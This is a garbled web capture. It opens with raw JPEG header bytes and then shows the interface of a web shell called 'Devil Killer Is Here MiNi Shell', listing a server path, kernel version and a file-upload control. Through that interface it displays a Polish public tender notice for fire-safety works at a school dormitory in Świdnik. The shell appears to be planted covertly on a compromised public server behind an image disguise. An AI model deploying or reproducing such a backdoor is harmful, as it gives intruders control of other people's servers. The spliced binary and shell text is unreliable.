JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211110/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211110/0026567901-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Modernizacja internatu przy PCEZ w Świdniku w zakresie dostosowania budynku do przepisów przeciwpożarowych.” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Świdnicki</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Powiatowe Centrum Edukacji Zawodowej im. Zygmunta Puławskiego w Świdniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000037262</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szkolna 1</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Świdnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-045</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">INFO@PCEZ.PL</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">pcez.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Edukacja</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Modernizacja internatu przy PCEZ w Świdniku w zakresie dostosowania budynku do przepisów przeciwpożarowych.” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-28f8f836-4229-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00265679</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-11-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003508/02/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja internatu przy PCEZ w Świdniku w zakresie dostosowania budynku do przepisów przeciwpożarowych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiatswidnik.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiatswidnik.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Formaty<br/>plików wykorzystywanych przez wykonawców powinny być zgodne<br/>z “OBWIESZCZENIEM PREZESA RADY MINISTRÓW z dnia 9 listopada 2017 r. w sprawie ogłoszenia<br/>jednolitego tekstu rozporządzenia Rady Ministrów w sprawie Krajowych Ram Interoperacyjności,<br/>minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci elektronicznej oraz<br/>minimalnych wymagań dla systemów teleinformatycznych”.<br/>6.11. Zamawiający rekomenduje wykorzystanie formatów: .pdf .doc .xls .jpg (.jpeg) ze szczególnym<br/>wskazaniem na .pdf<br/>6.12. W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów: 1/.zip, 2/.7Z.<br/>6.13. Wśród formatów powszechnych a NIE występujących w rozporządzeniu występują: .rar .gif .bmp<br/>.numbers .pages. Dokumenty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>6.14. Zamawiający zwraca uwagę na ograniczenia wielkości plików podpisywanych profilem zaufanym,<br/>który wynosi max 10MB, oraz na ograniczenie wielkości plików podpisywanych w aplikacji eDoApp<br/>służącej do składania podpisu osobistego, który wynosi max 5MB.<br/>6.15. Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,<br/>zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format .pdf i opatrzenie ich podpisem kwalifikowanym PAdES.<br/>6.16. Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES.<br/>Wykonawca powinien pamiętać, aby plik z podpisem przekazywać łącznie z dokumentem<br/>podpisywanym.<br/>6.17. Zamawiający zaleca aby w przypadku podpisywania pliku przez kilka osób, stosować podpisy<br/>tego samego rodzaju. Podpisywanie różnymi rodzajami podpisów np. osobistym i kwalifikowanymmoże doprowadzić do problemów w weryfikacji plików.<br/>6.18. Zamawiający zaleca, aby Wykonawca z odpowiednim wyprzedzeniem przetestował możliwość<br/>prawidłowego wykorzystania wybranej metody podpisania plików oferty.<br/>6.19. Zaleca się, aby komunikacja z wykonawcami odbywała się tylko na Platformie za pośrednictwem<br/>formularza “Wyślij wiadomość do zamawiającego”, nie za pośrednictwem adresu email.<br/>6.20. Osobą składającą ofertę powinna być osoba kontaktowa podawana w dokumentacji.<br/>6.21. Ofertę należy przygotować z należytą starannością dla podmiotu ubiegającego się o udzielenie<br/>zamówienia publicznego i zachowaniem odpowiedniego odstępu czasu do zakończenia przyjmowania<br/>ofert/wniosków. Sugerujemy złożenie oferty na 24 godziny przed terminem składania ofert/wniosków.<br/>6.22. Podczas podpisywania plików zaleca się stosowanie algorytmu skrótu SHA2 zamiast SHA1.<br/>6.23. Jeśli wykonawca pakuje dokumenty np. w plik ZIP zalecamy wcześniejsze podpisanie każdego<br/>ze skompresowanych plików.<br/>6.24. Zamawiający rekomenduje wykorzystanie podpisu z kwalifikowanym znacznikiem czasu.<br/>6.25. Zamawiający zaleca aby nie wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich<br/>podpisem kwalifikowanym. Może to skutkować naruszeniem integralności plików co równoważne<br/>będzie z koniecznością odrzucenia oferty w postępowaniu.<br/>szczegóły w swz</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">a. Administratorem państwa danych osobowych<br/>przetwarzanych w związku z prowadzeniem postępowania o udzielenie zamówienia publicznego<br/>będzie jest Powiat Świdnicki w Świdniku reprezentowany przez Zarząd Powiatu w Świdniku, Mogą się<br/>Państwo z nami kontaktować w następujący sposób:<br/>􀀀 listownie na adres: Starostwo Powiatowe w Świdniku ul. Niepodległości 13, 21-040<br/>􀀀 poprzez e mail: poczta@powiatswidnik.pl<br/>􀀀 telefonicznie: 81 468-71-01,<br/>b. Wyznaczyliśmy inspektora ochrony danych.<br/>Jest to osoba, z którą mogą się Państwo kontaktować we wszystkich sprawach dotyczących<br/>przetwarzania danych osobowych oraz korzystania z praw związanych z przetwarzaniem danych. Z<br/>inspektorem ochrony danych mogą się Państwo kontaktować w następujący sposób:<br/>􀀀 listownie na adres: Powiat Świdnicki w Świdniku ul. Niepodległości 13, 21-040 Świdnik<br/>􀀀 poprzez e-mail: iod@powiatswidnik.pl<br/>c. Cel przetwarzania Państwa danych oraz podstawy prawne<br/>Państwa dane będą przetwarzane w celu związanym z postępowaniem o udzielenie zamówienia<br/>publicznego. Podstawa prawną ich przetwarzania jest Państwa zgoda wyrażona poprzez akt<br/>uczestnictwa w postepowaniu oraz następujące przepisy prawa:<br/>􀀀 ustawa z dnia 11 września 2019 roku Prawo zamówień publicznych (t.j. Dz. U. z 2019 r. poz. 2019 ze<br/>zm.) oraz akty wykonawcze to tejże ustawy,<br/>􀀀 ustawa o narodowym zasobie archiwalnym i archiwach (tj. Dz.U. 2019 r. poz. 553 ze zm.).<br/>d. Okres przechowywania danych<br/>Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przetwarzane będą przez okres 4 lata: od dnia zakończenia postępowania o udzielenie zamówienia.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">e. Komu przekazujemy Państwa dane?<br/>􀀀 Państwa dane pozyskane w związku z postępowaniem o udzielenie zamówienia publicznego<br/>przekazywane będą wszystkim zainteresowanym podmiotom i osobom, gdyż co do zasady<br/>postępowanie o udzielenie zamówienia publicznego jest jawne.<br/>􀀀 Ograniczenie dostępu do Państwa danych o których mowa wyżej może wystąpić jedynie w<br/>szczególnych przypadkach jeśli jest to uzasadnione ochroną prywatności zgodnie z ustawą z dnia 11września 2019 r. Prawo zamówień publicznych<br/>􀀀 Ponadto odbiorcą danych zawartych w dokumentach związanych z postępowaniem o za mówienie<br/>publiczne mogą być podmioty z którymi Powiat zawarł umowy lub porozumienie na korzystanie z<br/>udostępnianych przez nie systemów informatycznych w zakresie przekazywania lub archiwizacji<br/>danych. Zakres przekazania danych tym odbiorcom ograniczony jest jednak wyłącznie do możliwości<br/>zapoznania się z tymi danymi w związku ze świadczeniem usług wsparcia technicznego i usuwaniem<br/>awarii. Odbiorców tych obowiązuje klauzula zachowania poufności pozyskanych w takich<br/>okolicznościach wszelkich danych, w tym danych osobowych.<br/>f. Przekazywanie danych poza Europejski Obszar Gospodarczy<br/>W związku z jawnością postępowania o udzielenie zamówienia publicznego Państwa dane mogą być<br/>przekazywane do państw z poza EOG z zastrzeżeniem, o którym mowa w punkcie e ppkt 2).<br/>g. Przysługujące Państwu uprawnienia związane z przetwarzaniem danych osobowych<br/>W odniesieniu do danych pozyskanych w związku z prowadzonym postępowaniem o udzielenie<br/>zamówienia publicznego przysługują Państwu następujące uprawnienia:<br/>􀀀 prawo dostępu do swoich danych oraz otrzymania ich kopii;<br/>􀀀 prawo do sprostowania (poprawiania) swoich danych;<br/>􀀀 prawo do usunięcia danych osobowych, w sytuacji, gdy przetwarzanie danych nie następuje w celu<br/>wywiązania się z obowiązku wynikającego z przepisu prawa lub w ramach sprawowania władzy<br/>publicznej;<br/>􀀀 prawo do ograniczenia przetwarzania danych, przy czym przepisy odrębne mogą wyłączyć<br/>możliwość skorzystania z tego praw,<br/>􀀀 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych. Aby skorzystać z<br/>powyższych praw, należy się skontaktować z nami lub z naszym inspektorem ochrony danych (dane<br/>kontaktowe zawarte są w punktach a i b.<br/>h. Obowiązek podania danych<br/>Podanie danych osobowych w związku udziałem w postępowaniu o zamówienia publiczne nie jest<br/>obowiązkowe, ale może być warunkiem niezbędnym do wzięcia w nim udziału. Wynika to stąd, że w<br/>zależności od przedmiotu zamówienia, zamawiający może żądać ich podania na podstawie przepisów<br/>ustawy Prawo zamówień publicznych oraz wydanych do niej przepisów wykonawczych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PCEZ.272.2.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1. Zadanie pod nazwą: Modernizacja internatu przy PCEZ w Świdniku w zakresie<br/>dostosowania budynku do przepisów przeciwpożarowych.<br/>3.2. Inwestycja realizowana w celu poprawy bezpieczeństwa przeciw pożarowego w budynku<br/>internatu.<br/>3.3. Przedmiot zamówienia dotyczy: wykonania systemu oddymiana klatki chodowej i korytarzy,<br/>wykonania oświetleni8a ewakuacyjnego i awaryjnego, wykonanie systemu sygnalizacji pożaru,<br/>wymiana balustrady na klatce schodowej, wymiana okna na V piętrze oraz dwóch okien<br/>piwnicznych na okna o zwiększonej odporności ogniowej, roboty rozbiórkowe, robotybetoniarskie, wymiana elementów konstrukcyjnych i stalowych, wykonanie naprawy i<br/>uzupełnienie pokryć dachowych, tynkowanie, instalowanie okien, wymiana izolacji, roboty<br/>malarskie.3.4.	Szczegółowy opis przedmiotu zamówienia określają następujące dokumenty:<br/>a) projekt budowlany,<br/>b) szczegółowa specyfikacja techniczna wykonania i odbioru robót budowlanych (SSTWiORB),<br/>c) przedmiar robót.<br/>Zamawiający informuje, iż w punkcie 3.3 został ujęty zakres prac robót budowlanych, które w szczególności obejmuje dokumentacja wymieniona w punkcie 3.4. <br/>Projekt budowlany dotyczy całości inwestycji związanej z modernizacją budynku internatu PCEZ. Wykonawca w celu prawidłowego oszacowania wartości oferty powinien bazować tych elementach projektu budowlanego i szczegółowej specyfikacji technicznej wykonania i odbioru robót budowlanych, które znajdują swoje odzwierciedlenie przedmiarze robót. Przedmiar został zaaktualizowany i zawiera pozycje którymi zostanie objęte przedmiotowe postępowanie. <br/>3.5. Zamawiający zastrzega możliwość unieważnienia postępowania o udzielenia zamówienia,<br/>jeżeli środki publiczne, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub<br/>części zamówienia, nie zostały mu przyznane.<br/>3.6. Źródła finansowania: Zamawiający informuje, iż inwestycja finansowana jest ze środków<br/>zewnętrznych.<br/>3.7. Wykonawca, któremu zostanie udzielone zamówienie udzieli zamawiającemu gwarancji i<br/>rękojmi na okres zadeklarowany w ofercie. Minimalny wymagany okres gwarancji i rękojmi na<br/>wykonane roboty wynosi 60 miesięcy. Wykonawca może zaproponować dłuższy okres,<br/>przedłużając okres minimalny o dodatkowe 12 albo maksymalnie o 24 miesiące, co będzie<br/>uwzględnione podczas oceny i badania ofert na zasadach określonych w rozdziale KRYTERIA<br/>OCENY OFERT (sekcja 14 SWZ). Okres gwarancji równy jest okresowi rękojmi. Zamawiający<br/>wymaga gwarancji w formie pisemnej.<br/>3.8. Wskazane jest aby Wykonawca dokonał wizji lokalnej budynku.<br/>3.10. Elementami składowymi przedmiotu zamówienia są także wszelkie roboty i usługi<br/>towarzyszące realizacji robót, w szczególności: koszty obsługi geodezyjnej, koszty uzyskania<br/>niezbędnych opinii<br/>i uzgodnień, zużycia wody i energii elektrycznej, ubezpieczenia budowy, wszelkich robót<br/>przygotowawczych, porządkowych, zabezpieczenia placu budowy, utrzymania zaplecza<br/>budowy, doprowadzenia terenu do stanu pierwotnego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45310000-3 - Roboty instalacyjne elektryczne</p> <p class="mb-0">45400000-1 - Roboty wykończeniowe w zakresie obiektów budowlanych</p> <p class="mb-0">45450000-6 - Roboty budowlane wykończeniowe, pozostałe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">30 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">PO = PC + PG<br/>Gdzie<br/>PO – suma punktów przyznanych danej ofercie<br/>PC – punkty w kryterium Cena<br/>PG – punkty w kryterium Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> zdolności technicznej lub zawodowej:<br/>a) Wykonawca spełni warunek, jeżeli posiada doświadczenie niezbędne do wykonania<br/>przedmiotu zamówienia, tj. udokumentuje należyte wykonanie w okresie ostatnich pięciu lat<br/>przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w<br/>tym okresie, co najmniej jednej roboty budowlanej o charakterze prac odpowiadającej zakresowi<br/>zamówienia na kwotę brutto co najmniej o 150 000,00 zł brutto. Przez wartość 1 roboty<br/>budowlanej Zamawiający rozumie roboty budowlane w ramach 1 umowy (1 zadania<br/>inwestycyjnego). W przypadku podania kwot w walutach obcych Zamawiający dokona ich<br/>przeliczenia według średniego kursu Narodowego Banku Polskiego (NBP) z dnia opublikowania<br/>ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych. Jeżeli w dniu opublikowania<br/>ogłoszenia o zamówieniu, NBP nie opublikuje informacji o średnim kursie walut, Zamawiający<br/>dokona odpowiednich przeliczeń wg średniego kursu z pierwszego, kolejnego dnia, w którym<br/>NBP opublikuje ww. informacje.<br/>Uwaga: w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>(konsorcjum) warunek zostanie uznany za spełniony, jeżeli co najmniej jeden ze wspólników<br/>konsorcjum samodzielnie posiada wymagane doświadczenie (nie dopuszcza się sumowania<br/>potencjału wspólników w zakresie doświadczenia). Podobnie w przypadku powoływania się na<br/>zasoby podmiotu trzeciego w celu spełnienia warunków udziału w postępowaniu (w zakresie<br/>doświadczenia), podmiot ten musi samodzielnie posiadać doświadczenie opisane powyżej.b) Wykonawca spełni warunek jeżeli dysponuje osobami zdolnymi do wykonania zamówienia, w<br/>tym co najmniej:<br/>- co najmniej jedną osobę, która będzie pełnić funkcję Kierownika budowy uprawnioną do<br/>pełnienia samodzielnej funkcji technicznej przy kierowaniu robotami budowlanymi w<br/>specjalności konstrukcyjno-budowlanej bez ograniczeń, lub odpowiadające im równoważne<br/>uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów, a wprzypadku Wykonawców zagranicznych – uprawnienia budowlane do kierowania robotami<br/>równoważne do wyżej wskazanych; posiadającą minimalnie 3 letnie doświadczenie zawodowe<br/>oraz w tym pełnienie funkcji Kierownika budowy w min. jednej robocie budowlanej o charakterze<br/>prac odpowiadającej zakresowi zamówienia<br/>-co najmniej jedną osobę, która będzie pełnić funkcję Kierownika robót w specjalności instalacji<br/>elektrycznych uprawnioną do pełnienia samodzielnej funkcji technicznej przy kierowaniu<br/>robotami budowlanymi w specjalności instalacyjno–inżynieryjnej w zakresie sieci i instalacji<br/>elektrycznych, bez ograniczeń, lub odpowiadające im równoważne uprawnienia budowlane<br/>wydane na podstawie wcześniej obowiązujących przepisów, a w przypadku Wykonawców<br/>zagranicznych – uprawnienia budowlane do kierowania robotami równoważne do wyżej<br/>wskazanych; posiadającą minimalnie 3 letnie doświadczenie zawodowe oraz w tym pełnienie<br/>funkcji Kierownika budowy w min. jednej robocie o charakterze prac odpowiadającej zakresowi<br/>zamówienia.UWAGA:<br/>Osoba, która będzie pełnić funkcję kierownika budowy lub kierownika robót w specjalności<br/>instalacji elektrycznych musi posiadać uprawnienia budowlane wymagane ustawą z dnia 07 lipca<br/>1994 r. Prawo budowlane (Dz. U. z 2020 r. poz.: 1333 z późn.zm.) oraz Rozporządzeniem<br/>Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego<br/>do wykonywania samodzielnych funkcji technicznych w budownictwie (t.j. Dz. U z 2019 r. poz.<br/>831) lub odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie<br/>wcześniej obowiązujących przepisów.<br/>Zgodnie z art. 12a ustawy Prawo budowlane samodzielne funkcje techniczne w budownictwie,<br/>określone w art. 12 ust. 1 ustawy mogą również wykonywać osoby, których odpowiednie<br/>kwalifikacje zawodowe zostały uznane na zasadach określonych w przepisach odrębnych.<br/>Regulację odrębną stanowią przepisy 